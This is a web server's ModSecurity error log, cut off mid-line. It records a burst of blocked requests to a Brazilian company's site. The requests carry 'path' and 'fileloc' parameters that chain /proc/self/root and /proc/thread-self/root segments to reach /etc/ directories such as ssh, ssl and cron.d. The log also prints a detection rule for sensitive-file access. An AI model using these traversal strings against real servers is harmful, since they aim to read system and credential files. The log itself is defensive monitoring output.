[Fri Mar 20 06:26:08.075538 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.243.128:53552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SsPXLqtnMIWvjpaKHlQAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:09.356804 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.243.128:53558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SsfHIg5MgXLBnicPm7QAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:12.253030 2026] [:error] [pid 11642:tid 140411582465792] [client 74.7.243.128:50024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0StLninkcc-iUj5ApL8wAAA5M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:13.538370 2026] [:error] [pid 9818:tid 140411590858496] [client 74.7.243.128:50032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0StV1pVZ5mVmJwsFMdUgAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:14.702569 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.243.128:50040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0StvHIg5MgXLBnicPm8QAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:16.013154 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:50048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SuOoXxyEfFpUF8f9vdAAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:17.214254 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.243.128:50058] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SuQF0L0L-SsrnPo5VDQAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:18.497017 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.243.128:50074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SugF0L0L-SsrnPo5VEAAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:19.767655 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:48234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Su9a6ubjKNq_cu4a__AAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:20.922286 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:48242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SvNa6ubjKNq_cu4a__wAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:22.247849 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.241.31:54654] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Svl1pVZ5mVmJwsFMdWgAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:22.282903 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.243.128:48258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Svrninkcc-iUj5ApL9gAAA4I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:23.562999 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.241.31:32784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Sv_qxLDW4GITHUkTSigAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:24.992948 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.241.31:32786] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SwLninkcc-iUj5ApL-QAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:28.877286 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:32798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SxOoXxyEfFpUF8f9vgAAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:30.003351 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.243.128:48262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SxhCii7xarUs8iHZVzwAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:30.170575 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.241.31:34680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SxvqxLDW4GITHUkTSjwAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:31.456656 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.241.31:34686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SxzJ3M9BSuKP7CAYExwAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:32.811255 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.241.31:34692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SyPqxLDW4GITHUkTSkgAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:33.704281 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.243.128:53642] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SyTJ3M9BSuKP7CAYEygAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:34.060360 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.241.31:34704] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SyvqxLDW4GITHUkTSlQAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:35.370519 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.241.31:34706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri 